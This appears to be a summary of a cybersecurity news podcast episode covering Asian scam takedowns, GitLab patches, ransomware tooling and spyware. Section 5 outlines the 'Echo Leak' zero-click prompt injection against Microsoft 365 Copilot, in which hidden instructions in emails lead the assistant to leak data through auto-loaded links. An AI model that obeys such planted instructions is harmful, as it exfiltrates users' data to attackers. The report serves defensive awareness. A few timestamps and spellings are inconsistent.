CyberWire Daily: Scam Operations Disrupted Across Asia Release Date: June 12, 2025 | Host: N2K Networks

Overview

In today's episode of CyberWire Daily, host Dave Bittner delves into significant cybersecurity developments focusing on major disruptions of scam operations across Asia. The episode covers a spectrum of topics including international law enforcement collaborations, advanced cyber threats, critical vulnerabilities in popular platforms, and insightful analysis on U.S. antitrust policies affecting the tech industry. Notable insights are provided by N2K's lead analyst, Ethan Cook, offering listeners a comprehensive understanding of the current cybersecurity landscape.

1. Interpol's Operation Secure Dismantles Major Cybercrime Network in Asia

Timestamp: [00:02]

Interpol, in collaboration with 25 other nations across Asia and the South Pacific, has successfully executed Operation Secure, targeting a vast cybercrime network. Key achievements of this operation include:

• Removal of 20,000 malicious IP addresses and domains associated with InfoStealer malware.
• Seizure of 41 servers and over 100 gigabytes of data.
• Identification of 117 command and control servers utilized for phishing, fraud, and data theft, encompassing sensitive information such as passwords and cryptocurrency wallet details.

Notable Quote:

"Interpol worked with cybersecurity firms like Group IB and Kaspersky to share intel, highlighting the value of international collaboration in combating global cyber threats." – Dave Bittner [02:45]

Impact:

• 216,000 individuals were alerted to potential security risks.
• 32 arrests were made across countries including Vietnam, Sri Lanka, and Nauru.

2. Singapore Leads Operation Frontier Plus Against Scam Syndicates

Timestamp: [08:15]

Singapore spearheaded Operation Frontier Plus, a month-long multinational initiative aimed at dismantling scam syndicates responsible for approximately $225 million in fraud. Key actions and outcomes include:

• Coordination with law enforcement from Hong Kong, South Korea, Malaysia, the Maldives, Thailand, and Macau.
• Investigation of nearly 34,000 suspects linked to over 9,200 scams, ranging from fake investments to romance and job scams.
• 1,800 arrests made, 32,000 bank accounts frozen, and $20 million seized.
• Singapore alone arrested 106 suspects tied to $30 million in fraud, recovering $8 million.

Notable Quote:

"Officials stress the growing sophistication of these scams and the need for a global response." – Dave Bittner [09:30]

3. GitLab Addresses Critical Vulnerabilities in DevSecOps Platform

Timestamp: [12:50]

GitLab has released urgent security updates to patch multiple vulnerabilities within its DevSecOps platform. These flaws present significant risks, including:

• Account takeover vulnerabilities.
• The ability for attackers to inject malicious jobs into CI/CD pipelines.

Key Vulnerabilities Addressed:

• HTML injection
• Missing authorization
• Cross-site scripting (XSS)
• Denial of Service (DoS) flaws

Action Required:

• GitLab.com has already been patched.
• Users of self-managed instances are urged to upgrade immediately to prevent potential exploits.

4. Researchers Uncover Smart Attack: Data Exfiltration via Smartwatches

Timestamp: [17:05]

Israeli researchers have unveiled a sophisticated method dubbed Smart Attack, which enables data exfiltration from air-gapped systems using smartwatches. The attack methodology involves:

• Malware on a secure, isolated computer emits ultrasonic signals through built-in speakers.
• These inaudible tones, modulated to carry data, are captured by a nearby smartwatch's microphone.
• The smartwatch then transmits the data via Wi-Fi, Bluetooth, or cellular networks.

Implications:

• Demonstrates how insider threats can bypass physical isolation measures.
• Highlights the potential risks of wearable technology in secure environments.

Mitigation Strategies:

• Banning smartwatches in sensitive areas.
• Disabling speakers on secure systems to prevent signal emission.

5. Microsoft Copilot's 'Echo Leak' Vulnerability Exploited for Data Exfiltration

Timestamp: [21:30]

Microsoft has disclosed a critical vulnerability in its 365 Copilot AI assistant, identified as the first known zero-click attack on an AI agent, termed Echo Leak. The exploit allows attackers to:

• Exfiltrate sensitive data by exploiting a new LLM scope violation.
• Send emails containing hidden prompt injections disguised as legitimate business content.
• Upon user interaction with Copilot-related queries, the AI retrieves malicious emails as context, embedding stolen data into links that automatically send requests to attacker-controlled servers without any user clicks.

Key Details:

• Discovered by AIM Security in January 2025.
• Patched by Microsoft in May 2025 with server-side updates.
• No evidence of exploitation in the wild; no immediate action required by customers.

6. Paragon's Graphite Spyware Targets Journalists in Italy and Europe

Timestamp: [25:10]

Citizen Lab has confirmed the first known infections of Paragon's Graphite Spyware, targeting Italian journalist Ciro Pellegrino and an unnamed European journalist. Key points include:

• Zero-click iMessage exploit used to compromise devices without user interaction.
• Associated with Italian intelligence agencies, although Italy denies involvement.
• Additional victims include journalists and migrant aid workers, suggesting a broader targeting scope.

Impact:

• Government Response: Despite denials, the spyware scandal has intensified with increased scrutiny.
• Withdrawal of Ties: Israel's Paragon ended its relationship with Italy following the government's refusal to investigate.

Notable Quote:

"Despite Italy's denials, the spyware scandal has widened with other victims, including journalists and migrant aid workers." – Dave Bittner [26:45]

7. France's CNIL Proposes Regulations on Email Tracking Pixels

Timestamp: [29:20]

France's data watchdog, CNIL, has launched a public consultation on a draft recommendation aimed at regulating the use of tracking pixels in emails. These invisible one-by-one-pixel images are often used to monitor email open rates, raising significant privacy concerns.

Key Aspects of the Proposal:

• Clarification of consent requirements for email tracking.
• Ensuring compliance with privacy standards amid rising complaints about email tracking.
• Applicable to all organizations and their service providers utilizing email tracking technologies.

Consultation Details:

• Duration: Open until July 24, 2025.
• Additional Focus: CNIL is seeking input on the economic impact of the proposed regulations.

8. FOG Ransomware Operators Utilize Unusual Toolkit to Evade Detection

Timestamp: [33:50]

FOG Ransomware operators have been observed deploying an atypical mix of tools, combining open-source utilities with legitimate software to bypass standard detection mechanisms. Notable elements of their toolkit include:

• Siteca and employee monitoring software: Used to capture credentials.
• GC2: A rare backdoor leveraging platforms like Google Sheets or SharePoint for command and control (C2).
• Stowaway: Facilitates stealthy delivery of malware.
• SMB Exec and PSEXEC: Employed for lateral movement within networks.
• Adapt 2xC2: Utilized for post-exploitation activities.
• 7zip, MegaSync, and free file sync: Used for data exfiltration.

Implications:

• The combination of Sciteca and GC2 signals an evolving strategy that challenges traditional ransomware detection techniques.

Notable Quote:

"The attackers also used 7zip, MegaSync and free file sync for data exfiltration." – Dave Bittner [34:30]

9. Skeleton Spider Shifts Tactics to Target Recruiters via LinkedIn

Timestamp: [38:10]

The cybercriminal group Fin6, also known as Skeleton Spider, is adopting new strategies to infiltrate organizations by posing as job seekers on LinkedIn. Key tactics include:

• Phishing Emails: Convincing messages without clickable links, prompting recipients to manually enter URLs.
• Fake Resume Websites: Hosted on trusted platforms like AWS, utilizing Captcha and traffic filters to evade security tools.
• Malware Delivery: Redirects to More Eggs Backdoor, a malware-as-a-service tool designed to steal credentials and facilitate ransomware attacks.

Evolution:

• Historically focused on stealing payment card data from POS systems, Fin6 is now expanding to broader enterprise targets through sophisticated social engineering techniques.

Notable Quote:

"The use of professional messaging and cloud hosting allows them to evade detection, signaling a more sophisticated approach to targeting organizations through social engineering." – Dave Bittner [39:50]

10. Cyber Attack Causes Ongoing Outages for Erie Insurance

Timestamp: [42:20]

On June 7, 2025, Erie Insurance and Erie Indemnity Company experienced a significant cyber attack resulting in:

• Ongoing outages affecting customer access to portals.
• Inability to file claims or receive documents.
• Activation of the Incident Response Plan, with collaboration alongside law enforcement and cybersecurity experts.

Current Status:

• Nature and Impact: Remain unclear; no confirmation if ransomware or data theft is involved.
• Customer Assurance: Erie Insurance emphasized that they won't request payments via email or phone during the outage.

11. In-Depth Analysis: Trump's Aggressive Antitrust Policies

Timestamp: [15:54]

In a segment from the Caveat podcast, N2K's lead analyst, Ethan Cook, engages in a detailed discussion about the Trump administration's stance on antitrust policies, particularly in relation to Big Tech. Key points include:

• Aggressive Approach: The Trump administration is arguably the most proactive in two decades against Big Tech's monopolistic practices, challenging ongoing cases initially propelled by the Biden administration.

• Unexpected Firmness: Contrary to expectations that Trump would favor Silicon Valley due to his 2024 supporter base, the administration has continued to vigorously pursue antitrust cases, including ongoing actions against Google.

• Lina Khan's Influence: While the FTC under Lina Khan—a noted antitrust hawk—led many initiatives, elements within Trump's administration, such as Vice President JD Vance, have shown admiration for Khan's work, potentially influencing policy directions.

Notable Quotes:

"I think this is a really interesting surprise that his administration has been so tough, particularly because a lot of the Trump presidency has been undoing the work of the previous administration." – Ethan Cook [16:45]

"There's that rift between him and social media companies, him and big tech companies...they have kept their foot on the gas pedal." – Ethan Cook [17:10]

Discussion Highlights:

• Coalition Dynamics: Despite strong initial alliances with Silicon Valley figures like Bezos, Musk, and Zuckerberg during Trump's inauguration, underlying tensions and conflicting interests have persisted.

• Policy Continuity and Change: The administration's relentless pursuit of antitrust actions suggests a complex interplay between political loyalty, economic strategies, and regulatory priorities.

Conclusion: Ethan Cook underscores the unexpected tenacity of Trump's administration in addressing antitrust issues, highlighting a shift from perceived alliances to a more regulatory stance against major technology firms.

Conclusion

Today's episode of CyberWire Daily underscores the dynamic and evolving nature of cyber threats and the global efforts to combat them. From international law enforcement collaborations disrupting vast cybercrime networks to sophisticated malware attacks exploiting everyday devices, the cybersecurity landscape remains highly volatile. Additionally, the in-depth analysis of U.S. antitrust policies provides valuable insights into how political dynamics can influence regulatory approaches towards big tech. As cyber threats continue to advance in complexity, the importance of international cooperation, proactive security measures, and informed policy-making becomes ever more critical.

Notable Sponsor Mentions:

• Indeed: Highlighted their effectiveness in hiring, with a special $75 sponsored job credit for listeners.
• Vanta: Promoted their trust management platform for governance, risk, and compliance.
• SpyCloud: Offered solutions for identity threat protection.

Please note that sponsor messages and advertisements have been excluded from this summary to focus solely on the content-rich discussions and analyses.